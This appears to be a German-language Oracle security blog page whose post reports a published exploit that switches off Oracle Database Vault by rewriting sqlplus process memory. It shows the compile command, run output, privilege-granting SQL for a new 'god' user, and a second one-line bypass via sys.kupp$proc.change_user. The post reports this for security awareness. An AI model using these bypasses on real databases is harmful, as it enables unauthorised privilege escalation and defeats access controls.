- 11g (8)
- Allgemein (25)
- checkpwd (4)
- CPUApril2009 (2)
- CPUJan2009 (3)
- CPUJul2009 (2)
- CPUOct2009 (3)
- David Litchfield (7)
- Exploit (19)
- Forensics (4)
- Oracle Security (76)
- passwords (7)
- SAP (1)
- Security (16)
- Sentrigo (5)
- software (7)
- source code audit (3)
- SQL Injection (20)
- Tools (18)
- Trainings (2)
- Tutorial (2)
- 5 Feb 2010: Oracle Blackhat video removed from Website
- 4 Feb 2010: Oracle 11g 0day exploit published
- 30 Jan 2010: Selling stolen bank data to the government for 2.5 Million EUR?
- 6 Dez 2009: Dennis Yurichev wrote an article about his FPGA Oracle password cracker
- 29 Nov 2009: IGHASHGPU - Cracking Oracle Passwords with 790 Million Passwords/second
- 25 Nov 2009: How Oracle controls access to security vulnerabilities
- 17 Nov 2009: Metasploit 3.3 is out
- 17 Nov 2009: Security Workshop "Database Activity Monitoring Systems" in London
- 13 Nov 2009: New russian Oracle exploit tool "Oracle Security Tools" (updated)
- 8 Nov 2009: Oracle Database Vault is now certified with SAP
Oracle Security
Other Blogs
SQL Injection
Trainings
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Oracle Database Vault Privilege Escalation Exploit published
Few days ago Jakub Wartak has posted an exploit showing how to switch DV off on his blog.Jakub describes that he was surprised that Data Vault does not protect from OS side. That’s something many people are not aware of. Oracle Data Vault is not designed to protect from normal DBAs (with OS access).Here the usage of his exploit:
[oracle@xeno ora_dv_mem_off]$ !gcc [oracle@xeno ora_dv_mem_off]$ ./ora_dv_mem_off SQL*Plus: Release 10.2.0.3.0 - Production on Wed Feb 27 18:56:55 2008 Copyright (c) 1982, 2006, Oracle. All Rights Reserved. SQL> conn / as sysdba User created. SQL> grant dba,dv_admin,dv_owner,connect,resource to god; Grant succeeded. Here is another (easier) way to bypass Data Vault without installing/compiling software. I found this issue a few months ago (in Oracle 11.1.0.6). After contacting secalert they told me that this issue was already fixed in Oracle CPU July 2008 (but not documented): – run as user with DBA privleges SQL> exec sys.kupp$proc.change_user(’DVA’); PL/SQL procedure successfully completed.
gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
ora_dv_mem_off.c: In function ‘locate_dv_func’:
ora_dv_mem_off.c:92: warning: initialization discards qualifiers from pointer
target type
ora_dv_mem_off.c:93: warning: initialization makes pointer from integer
without a cast
[17035] starting to trace sqlplus process (17036)
[***] NOW TYPE IN SQLPLUS: conn / as sysdba
[17035] execve() syscall in 17036
[17035] clone() syscall in 17036, tracing orapid=17037
[17035] execve() syscall in 17037,
[17035] symbol “kzvtins” at 0xb185820
[***] sucessfuly validated function, DatabaseVault=1
[***] attempting to rewrite memory at 0xb185824
Connected.
SQL> create user god identified by abc;
Antwort schreiben
Sie müssen als angemeldet sein, um einen Kommentar schreiben zu können.